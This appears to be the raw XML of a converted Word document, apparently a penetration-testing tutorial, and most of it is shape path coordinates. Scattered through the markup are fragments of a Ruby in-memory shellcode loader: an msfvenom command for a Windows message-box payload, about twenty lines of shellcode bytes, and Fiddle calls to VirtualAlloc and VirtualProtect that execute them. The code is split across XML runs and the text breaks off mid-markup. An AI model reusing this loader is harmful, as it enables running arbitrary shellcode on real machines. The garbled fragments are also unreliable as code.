14,9361,9314,9360,9314,9359,9314,9357,9314,9356,9314,9355,9314,9354,9314,9352,9314,9351,9314,9349,9314,9348,9314,9347,9314,9345,9314,9343,9314,9342,9314,9340,9314,9339,9314,9337,9314,9335,9314,9333,9314,9331,9314,9330,9314,9328,9314,9326,9314,9324,9314,9322,9314,9320,9314,9317,9314,9315,9314,9313,9314,9311,9314,9309,9314,9306,9314,9304,9314,9301,9314,9299,9314,9296,9314,9294,9314,9291,9314,9289,9314,9286,9314,9283,9314,9280,9314,9278,9314,9275,9314,9272,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9314,9269,9313,9269,9313,9269,9313,9269,9313,9269,9313,9269,9313,9269,9313,9269,9313,9269,9313,9269,9312,9269,9312,9269,9312,9269,9312,9269,9312,9269,9311,9269,9311,9269,9311,9269,9310,9269,9310,9269,9310,9269,9309,9269,9309,9269,9308,9269,9308,9269,9307,9269,9307,9269,9306,9269,9305,9269,9305,9269,9304,9269,9303,9269,9302,9269,9302,9269,9301,9269,9300,9269,9299,9269,9298,9269,9297,9269,9296,9269,9295,9269,9294,9269,9292,9269,9291,9269,9290,9269,9289,9269,9287,9269,9286,9269,9284,9269,9283,9269,9281,9269,9279,9269,9278,9269,9276,9269,9274,9269,9272,9269,9270,9269,9268,9269,9266,9269,9264,9269,9262,9269,9260,9269,9257,9269,9255,9269,9252,9269,9250,9269,9247,9269,9245,9269,9242,9269,9239,9269,9236,9269,9233,9269,9230,9269,9227,9269,9224,9269,9221,9269,9217,9269,9214,9269,9211,9269,9207,9269,9203,9269,9200,9269,9196,9269,9192,9269,9188,9269,9184,9269,9180,9269,9176,9269,9171,9269,9167,9269,9162,9269,9158,9269,9153,9269,9148,9269,9143,9269,9138,9269,9133,9269,9128,9269,9123,9269,9118,9269,9112,9269,9107,9269,9101,9269,9095,9269,9089,9269,9083,9269,9077,9269,9071,9269,9065,9269,9059e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:557.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,11150" coordsize="130,270">
        <v:shape style="position:absolute;left:3130;top:11150;width:130;height:270" coordorigin="3130,11150" coordsize="130,270" path="m3146,11175l3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3146,11175,3147,11175,3147,11175,3147,11175,3147,11175,3147,11175,3147,11175,3148,11175,3148,11175,3148,11175,3148,11175,3148,11175,3149,11175,3149,11175,3149,11175,3149,11175,3150,11175,3150,11175,3150,11175,3151,11175,3151,11175,3152,11175,3152,11175,3153,11175,3153,11175,3153,11175,3154,11175,3154,11175,3155,11175,3156,11175,3156,11175,3157,11175,3157,11175,3158,11175,3159,11175,3159,11175,3160,11175,3161,11175,3162,11175,3163,11175,3163,11175,3164,11175,3165,11175,3166,11175,3167,11175,3168,11175,3169,11175,3170,11175,3171,11175,3172,11175,3173,11175,3174,11175,3176,11175,3177,11175,3178,11175,3179,11175,3181,11175,3182,11175,3183,11175,3185,11175,3186,11175,3188,11175,3189,11175,3191,11175,3192,11175,3194,11175,3196,11175,3198,11175,3199,11175,3201,11175,3203,11175,3205,11175,3207,11175,3209,11175,3211,11175,3213,11175,3215,11175,3217,11175,3219,11175,3221,11175,3223,11175,3226,11175,3228,11175,3230,11175,3233,11175,3235,11175,3238,11175,3240,11175,3243,11175,3246,11175,3248,11175,3251,11175,3254,11175,3257,11175,3260,11175,3263,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11175,3266,11176,3266,11176,3266,11176,3266,11176,3266,11176,3266,11176,3266,11177,3266,11177,3266,11177,3266,11178,3266,11178,3266,11178,3266,11179,3266,11179,3266,11180,3266,11180,3266,11181,3266,11181,3266,11182,3266,11182,3266,11183,3266,11184,3266,11184,3266,11185,3266,11186,3266,11187,3266,11188,3266,11188,3266,11189,3266,11190,3266,11191,3266,11192,3266,11194,3266,11195,3266,11196,3266,11197,3266,11198,3266,11200,3266,11201,3266,11203,3266,11204,3266,11206,3266,11207,3266,11209,3266,11211,3266,11212,3266,11214,3266,11216,3266,11218,3266,11220,3266,11222,3266,11224,3266,11227,3266,11229,3266,11231,3266,11234,3266,11236,3266,11239,3266,11241,3266,11244,3266,11246,3266,11249,3266,11252,3266,11255,3266,11258,3266,11261,3266,11264,3266,11268,3266,11271,3266,11274,3266,11278,3266,11281,3266,11285,3266,11289,3266,11293,3266,11296,3266,11300,3266,11304,3266,11309,3266,11313,3266,11317,3266,11322,3266,11326,3266,11331,3266,11335,3266,11340,3266,11345,3266,11350,3266,11355,3266,11360,3266,11365,3266,11371,3266,11376,3266,11382,3266,11387,3266,11393,3266,11399,3266,11405,3266,11411,3266,11417,3266,11423,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3266,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3265,11430,3264,11430,3264,11430,3264,11430,3264,11430,3264,11430,3264,11430,3263,11430,3263,11430,3263,11430,3263,11430,3262,11430,3262,11430,3262,11430,3261,11430,3261,11430,3261,11430,3260,11430,3260,11430,3260,11430,3259,11430,3259,11430,3258,11430,3258,11430,3257,11430,3257,11430,3256,11430,3256,11430,3255,11430,3254,11430,3254,11430,3253,11430,3252,11430,3252,11430,3251,11430,3250,11430,3249,11430,3249,11430,3248,11430,3247,11430,3246,11430,3245,11430,3244,11430,3243,11430,3242,11430,3241,11430,3240,11430,3239,11430,3238,11430,3237,11430,3236,11430,3234,11430,3233,11430,3232,11430,3231,11430,3229,11430,3228,11430,3226,11430,3225,11430,3223,11430,3222,11430,3220,11430,3219,11430,3217,11430,3215,11430,3214,11430,3212,11430,3210,11430,3208,11430,3206,11430,3205,11430,3203,11430,3201,11430,3199,11430,3197,11430,3194,11430,3192,11430,3190,11430,3188,11430,3186,11430,3183,11430,3181,11430,3178,11430,3176,11430,3173,11430,3171,11430,3168,11430,3166,11430,3163,11430,3160,11430,3157,11430,3154,11430,3152,11430,3149,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11430,3146,11429,3146,11429,3146,11429,3146,11429,3146,11429,3146,11429,3146,11429,3146,11429,3146,11429,3146,11428,3146,11428,3146,11428,3146,11428,3146,11427,3146,11427,3146,11427,3146,11426,3146,11426,3146,11426,3146,11425,3146,11425,3146,11424,3146,11424,3146,11423,3146,11423,3146,11422,3146,11421,3146,11421,3146,11420,3146,11419,3146,11419,3146,11418,3146,11417,3146,11416,3146,11415,3146,11414,3146,11413,3146,11412,3146,11411,3146,11410,3146,11408,3146,11407,3146,11406,3146,11405,3146,11403,3146,11402,3146,11400,3146,11399,3146,11397,3146,11395,3146,11394,3146,11392,3146,11390,3146,11388,3146,11386,3146,11384,3146,11382,3146,11380,3146,11378,3146,11376,3146,11373,3146,11371,3146,11368,3146,11366,3146,11363,3146,11361,3146,11358,3146,11355,3146,11352,3146,11349,3146,11346,3146,11343,3146,11340,3146,11337,3146,11333,3146,11330,3146,11327,3146,11323,3146,11319,3146,11316,3146,11312,3146,11308,3146,11304,3146,11300,3146,11296,3146,11292,3146,11287,3146,11283,3146,11278,3146,11274,3146,11269,3146,11264,3146,11259,3146,11254,3146,11249,3146,11244,3146,11239,3146,11234,3146,11228,3146,11223,3146,11217,3146,11211,3146,11205,3146,11200,3146,11193,3146,11187,3146,11181,3146,11175e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:609.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,12190" coordsize="130,270">
        <v:shape style="position:absolute;left:2530;top:12190;width:130;height:270" coordorigin="2530,12190" coordsize="130,270" path="m2545,12210l2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2545,12210,2546,12210,2546,12210,2546,12210,2546,12210,2546,12210,2546,12210,2546,12210,2546,12210,2546,12210,2546,12210,2546,12210,2547,12210,2547,12210,2547,12210,2547,12210,2547,12210,2547,12210,2548,12210,2548,12210,2548,12210,2548,12210,2549,12210,2549,12210,2549,12210,2550,12210,2550,12210,2550,12210,2551,12210,2551,12210,2551,12210,2552,12210,2552,12210,2553,12210,2553,12210,2554,12210,2554,12210,2555,12210,2555,12210,2556,12210,2556,12210,2557,12210,2558,12210,2558,12210,2559,12210,2560,12210,2561,12210,2561,12210,2562,12210,2563,12210,2564,12210,2565,12210,2566,12210,2567,12210,2568,12210,2569,12210,2570,12210,2571,12210,2572,12210,2573,12210,2574,12210,2575,12210,2577,12210,2578,12210,2579,12210,2580,12210,2582,12210,2583,12210,2585,12210,2586,12210,2588,12210,2589,12210,2591,12210,2592,12210,2594,12210,2596,12210,2597,12210,2599,12210,2601,12210,2603,12210,2604,12210,2606,12210,2608,12210,2610,12210,2612,12210,2614,12210,2617,12210,2619,12210,2621,12210,2623,12210,2625,12210,2628,12210,2630,12210,2633,12210,2635,12210,2638,12210,2640,12210,2643,12210,2645,12210,2648,12210,2651,12210,2654,12210,2656,12210,2659,12210,2662,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12210,2665,12211,2665,12211,2665,12211,2665,12211,2665,12211,2665,12211,2665,12211,2665,12212,2665,12212,2665,12212,2665,12212,2665,12213,2665,12213,2665,12213,2665,12213,2665,12214,2665,12214,2665,12215,2665,12215,2665,12216,2665,12216,2665,12217,2665,12217,2665,12218,2665,12218,2665,12219,2665,12220,2665,12221,2665,12221,2665,12222,2665,12223,2665,12224,2665,12225,2665,12226,2665,12227,2665,12228,2665,12229,2665,12230,2665,12231,2665,12233,2665,12234,2665,12235,2665,12237,2665,12238,2665,12240,2665,12241,2665,12243,2665,12245,2665,12246,2665,12248,2665,12250,2665,12252,2665,12254,2665,12256,2665,12258,2665,12260,2665,12262,2665,12264,2665,12267,2665,12269,2665,12272,2665,12274,2665,12277,2665,12279,2665,12282,2665,12285,2665,12288,2665,12291,2665,12294,2665,12297,2665,12300,2665,12303,2665,12306,2665,12310,2665,12313,2665,12317,2665,12321,2665,12324,2665,12328,2665,12332,2665,12336,2665,12340,2665,12344,2665,12348,2665,12353,2665,12357,2665,12362,2665,12366,2665,12371,2665,12376,2665,12380,2665,12385,2665,12390,2665,12396,2665,12401,2665,12406,2665,12412,2665,12417,2665,12423,2665,12429,2665,12434,2665,12440,2665,12446,2665,12453,2665,12459,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2665,12465,2664,12465,2664,12465,2664,12465,2664,12465,2664,12465,2664,12465,2664,12465,2663,12465,2663,12465,2663,12465,2663,12465,2663,12465,2662,12465,2662,12465,2662,12465,2661,12465,2661,12465,2661,12465,2660,12465,2660,12465,2660,12465,2659,12465,2659,12465,2658,12465,2658,12465,2657,12465,2657,12465,2656,12465,2656,12465,2655,12465,2655,12465,2654,12465,2653,12465,2653,12465,2652,12465,2651,12465,2651,12465,2650,12465,2649,12465,2648,12465,2648,12465,2647,12465,2646,12465,2645,12465,2644,12465,2643,12465,2642,12465,2641,12465,2640,12465,2639,12465,2638,12465,2636,12465,2635,12465,2634,12465,2633,12465,2632,12465,2630,12465,2629,12465,2627,12465,2626,12465,2625,12465,2623,12465,2622,12465,2620,12465,2618,12465,2617,12465,2615,12465,2613,12465,2612,12465,2610,12465,2608,12465,2606,12465,2604,12465,2602,12465,2600,12465,2598,12465,2596,12465,2594,12465,2592,12465,2590,12465,2587,12465,2585,12465,2583,12465,2580,12465,2578,12465,2576,12465,2573,12465,2571,12465,2568,12465,2565,12465,2563,12465,2560,12465,2557,12465,2554,12465,2551,12465,2548,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12465,2545,12464,2545,12464,2545,12464,2545,12464,2545,12464,2545,12463,2545,12463,2545,12463,2545,12463,2545,12462,2545,12462,2545,12462,2545,12461,2545,12461,2545,12460,2545,12460,2545,12459,2545,12459,2545,12458,2545,12458,2545,12457,2545,12456,2545,12456,2545,12455,2545,12454,2545,12453,2545,12452,2545,12451,2545,12451,2545,12450,2545,12449,2545,12447,2545,12446,2545,12445,2545,12444,2545,12443,2545,12441,2545,12440,2545,12439,2545,12437,2545,12436,2545,12434,2545,12433,2545,12431,2545,12429,2545,12427,2545,12426,2545,12424,2545,12422,2545,12420,2545,12418,2545,12416,2545,12413,2545,12411,2545,12409,2545,12406,2545,12404,2545,12401,2545,12399,2545,12396,2545,12393,2545,12391,2545,12388,2545,12385,2545,12382,2545,12379,2545,12376,2545,12372,2545,12369,2545,12366,2545,12362,2545,12359,2545,12355,2545,12351,2545,12347,2545,12344,2545,12340,2545,12335,2545,12331,2545,12327,2545,12323,2545,12318,2545,12314,2545,12309,2545,12305,2545,12300,2545,12295,2545,12290,2545,12285,2545,12280,2545,12275,2545,12269,2545,12264,2545,12258,2545,12253,2545,12247,2545,12241,2545,12235,2545,12229,2545,12223,2545,12217,2545,12210e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:740.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,14810" coordsize="130,270">
        <v:shape style="position:absolute;left:2530;top:14810;width:130;height:270" coordorigin="2530,14810" coordsize="130,270" path="m2545,14836l2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2546,14836,2546,14836,2546,14836,2546,14836,2546,14836,2546,14836,2546,14836,2546,14836,2546,14836,2546,14836,2546,14836,2547,14836,2547,14836,2547,14836,2547,14836,2547,14836,2547,14836,2548,14836,2548,14836,2548,14836,2548,14836,2549,14836,2549,14836,2549,14836,2550,14836,2550,14836,2550,14836,2551,14836,2551,14836,2551,14836,2552,14836,2552,14836,2553,14836,2553,14836,2554,14836,2554,14836,2555,14836,2555,14836,2556,14836,2556,14836,2557,14836,2558,14836,2558,14836,2559,14836,2560,14836,2561,14836,2561,14836,2562,14836,2563,14836,2564,14836,2565,14836,2566,14836,2567,14836,2568,14836,2569,14836,2570,14836,2571,14836,2572,14836,2573,14836,2574,14836,2575,14836,2577,14836,2578,14836,2579,14836,2580,14836,2582,14836,2583,14836,2585,14836,2586,14836,2588,14836,2589,14836,2591,14836,2592,14836,2594,14836,2596,14836,2597,14836,2599,14836,2601,14836,2603,14836,2604,14836,2606,14836,2608,14836,2610,14836,2612,14836,2614,14836,2617,14836,2619,14836,2621,14836,2623,14836,2625,14836,2628,14836,2630,14836,2633,14836,2635,14836,2638,14836,2640,14836,2643,14836,2645,14836,2648,14836,2651,14836,2654,14836,2656,14836,2659,14836,2662,14836,2665,14836,2665,14836,2665,14836,2665,14836,2665,14836,2665,14836,2665,14836,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14837,2665,14838,2665,14838,2665,14838,2665,14838,2665,14838,2665,14839,2665,14839,2665,14839,2665,14839,2665,14840,2665,14840,2665,14841,2665,14841,2665,14841,2665,14842,2665,14842,2665,14843,2665,14844,2665,14844,2665,14845,2665,14845,2665,14846,2665,14847,2665,14848,2665,14849,2665,14849,2665,14850,2665,14851,2665,14852,2665,14853,2665,14854,2665,14855,2665,14857,2665,14858,2665,14859,2665,14860,2665,14862,2665,14863,2665,14865,2665,14866,2665,14868,2665,14869,2665,14871,2665,14873,2665,14874,2665,14876,2665,14878,2665,14880,2665,14882,2665,14884,2665,14886,2665,14888,2665,14891,2665,14893,2665,14895,2665,14898,2665,14900,2665,14903,2665,14906,2665,14908,2665,14911,2665,14914,2665,14917,2665,14920,2665,14923,2665,14926,2665,14929,2665,14933,2665,14936,2665,14940,2665,14943,2665,14947,2665,14951,2665,14954,2665,14958,2665,14962,2665,14966,2665,14970,2665,14975,2665,14979,2665,14983,2665,14988,2665,14992,2665,14997,2665,15002,2665,15007,2665,15012,2665,15017,2665,15022,2665,15027,2665,15033,2665,15038,2665,15044,2665,15049,2665,15055,2665,15061,2665,15067,2665,15073,2665,15079,2665,15085,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2665,15092,2664,15092,2664,15092,2664,15092,2664,15092,2664,15092,2664,15092,2664,15092,2663,15092,2663,15092,2663,15092,2663,15092,2663,15092,2662,15092,2662,15092,2662,15092,2661,15092,2661,15092,2661,15092,2660,15092,2660,15092,2660,15092,2659,15092,2659,15092,2658,15092,2658,15092,2657,15092,2657,15092,2656,15092,2656,15092,2655,15092,2655,15092,2654,15092,2653,15092,2653,15092,2652,15092,2651,15092,2651,15092,2650,15092,2649,15092,2648,15092,2648,15092,2647,15092,2646,15092,2645,15092,2644,15092,2643,15092,2642,15092,2641,15092,2640,15092,2639,15092,2638,15092,2636,15092,2635,15092,2634,15092,2633,15092,2632,15092,2630,15092,2629,15092,2627,15092,2626,15092,2625,15092,2623,15092,2622,15092,2620,15092,2618,15092,2617,15092,2615,15092,2613,15092,2612,15092,2610,15092,2608,15092,2606,15092,2604,15092,2602,15092,2600,15092,2598,15092,2596,15092,2594,15092,2592,15092,2590,15092,2587,15092,2585,15092,2583,15092,2580,15092,2578,15092,2576,15092,2573,15092,2571,15092,2568,15092,2565,15092,2563,15092,2560,15092,2557,15092,2554,15092,2551,15092,2548,15092,2545,15092,2545,15092,2545,15092,2545,15092,2545,15092,2545,15092,2545,15092,2545,15092,2545,15092,2545,15092,2545,15091,2545,15091,2545,15091,2545,15091,2545,15091,2545,15091,2545,15091,2545,15091,2545,15091,2545,15091,2545,15091,2545,15090,2545,15090,2545,15090,2545,15090,2545,15090,2545,15089,2545,15089,2545,15089,2545,15088,2545,15088,2545,15088,2545,15087,2545,15087,2545,15086,2545,15086,2545,15085,2545,15085,2545,15084,2545,15083,2545,15083,2545,15082,2545,15081,2545,15080,2545,15080,2545,15079,2545,15078,2545,15077,2545,15076,2545,15075,2545,15074,2545,15073,2545,15072,2545,15070,2545,15069,2545,15068,2545,15066,2545,15065,2545,15064,2545,15062,2545,15061,2545,15059,2545,15057,2545,15056,2545,15054,2545,15052,2545,15050,2545,15048,2545,15046,2545,15044,2545,15042,2545,15040,2545,15037,2545,15035,2545,15033,2545,15030,2545,15028,2545,15025,2545,15022,2545,15020,2545,15017,2545,15014,2545,15011,2545,15008,2545,15005,2545,15002,2545,14999,2545,14995,2545,14992,2545,14988,2545,14985,2545,14981,2545,14978,2545,14974,2545,14970,2545,14966,2545,14962,2545,14958,2545,14953,2545,14949,2545,14945,2545,14940,2545,14936,2545,14931,2545,14926,2545,14921,2545,14916,2545,14911,2545,14906,2545,14901,2545,14896,2545,14890,2545,14885,2545,14879,2545,14873,2545,14867,2545,14861,2545,14855,2545,14849,2545,14843,2545,14836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3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6" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7192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11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require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'fiddle/types'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21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msfvenom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‐p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windows/messagebox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TEXT=Micropoor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TITLE=Micropoor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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐f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rub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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>y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6e7f8f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐smallest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8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shellcode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17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=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"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64"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48"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e"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48"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60"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48"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x52\xe8\x5f\xff\xff\xff\x68\x72\x58\x20\x20\x68\x6f\x70"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x6f\x6f\x68\x4d\x69\x63\x72\x31\xdb\x88\x5c\x24\x09\x89"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\xe3\x68\x72\x58\x20\x20\x68\x6f\x70\x6f\x6f\x68\x4d\x69"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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"\x63\x72\x31\xc9\x88\x4c\x24\x09\x89\xe1\x31\xd2\x52\x53"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46"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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458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11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"\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"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26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27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="806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28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include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Fiddle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29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="542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kernel32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Fiddle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dlopen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'kernel32'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31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32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ptr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Function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new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kernel32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[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'VirtualAlloc'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call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she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llcode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size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0x3000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0x40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pacing w:before="0" w:after="0" w:line="13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34</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="9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35</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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36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Function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new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kernel32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[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'VirtualProtect'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call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ptr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shell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code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size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2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37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="11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38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590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39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buf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Fiddle::Pointer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shellcode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40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41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264.0pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:214.332pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,4286">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:4286" coordorigin="10402,0" coordsize="0,4286" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,6,10402,8,10402,10,10402,12,10402,14,10402,17,10402,20,10402,23,10402,27,10402,30,10402,35,10402,39,10402,44,10402,50,10402,55,10402,62,10402,68,10402,75,10402,83,10402,91,10402,99,10402,109,10402,118,10402,128,10402,139,10402,150,10402,162,10402,175,10402,188,10402,202,10402,216,10402,231,10402,247,10402,264,10402,281,10402,299,10402,317,10402,337,10402,357,10402,378,10402,400,10402,423,10402,446,10402,471,10402,496,10402,522,10402,549,10402,577,10402,606,10402,636,10402,666,10402,698,10402,731,10402,765,10402,799,10402,835,10402,872,10402,910,10402,949,10402,989,10402,1030,10402,1073,10402,1116,10402,1161,10402,1207,10402,1254,10402,1302,10402,1351,10402,1402,10402,1454,10402,1507,10402,1562,10402,1617,10402,1675,10402,1733,10402,1793,10402,1854,10402,1916,10402,1980,10402,2046,10402,2112,10402,2180,10402,2250,10402,2321,10402,2394,10402,2468,10402,2543,10402,2620,10402,2699,10402,2779,10402,2861,10402,2944,10402,3029,10402,3116,10402,3204,10402,3294,10402,3385,10402,3478,10402,3573,10402,3670,10402,3768,10402,3868,10402,3970,10402,4074,10402,4179,10402,4286e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:32.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,650" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:650;width:8990;height:350" coordorigin="1490,650" coordsize="8990,350" path="m1510,669l1510,669,1510,669,1510,669,1510,669,1510,669,1510,669,1511,669,1512,669,1512,669,1514,669,1515,669,1517,669,1519,669,1521,669,1524,669,1528,669,1532,669,1536,669,1541,669,1546,669,1552,669,1559,669,1566,669,1575,669,1583,669,1593,669,1603,669,1615,669,1627,669,1640,669,1654,669,1668,669,1684,669,1701,669,1719,669,1738,669,1758,669,1780,669,1802,669,1826,669,1851,669,1877,669,1904,669,1933,669,1963,669,1995,669,2028,669,2063,669,2099,669,2136,669,2175,669,2216,669,2259,669,2303,669,2348,669,2396,669,2445,669,2496,669,2549,669,2604,669,2660,669,2719,669,2779,669,2841,669,2906,669,2972,669,3041,669,3112,669,3184,669,3259,669,3336,669,3416,669,3498,669,3582,669,3668,669,3757,669,3848,669,3941,669,4037,669,4136,669,4236,669,4340,669,4446,669,4555,669,4666,669,4780,669,4897,669,5017,669,5139,669,5264,669,5392,669,5523,669,5657,669,5793,669,5933,669,6076,669,6222,669,6370,669,6522,669,6677,669,6835,669,6997,669,7161,669,7329,669,7500,669,7675,669,7853,669,8034,669,8219,669,8407,669,8598,669,8793,669,899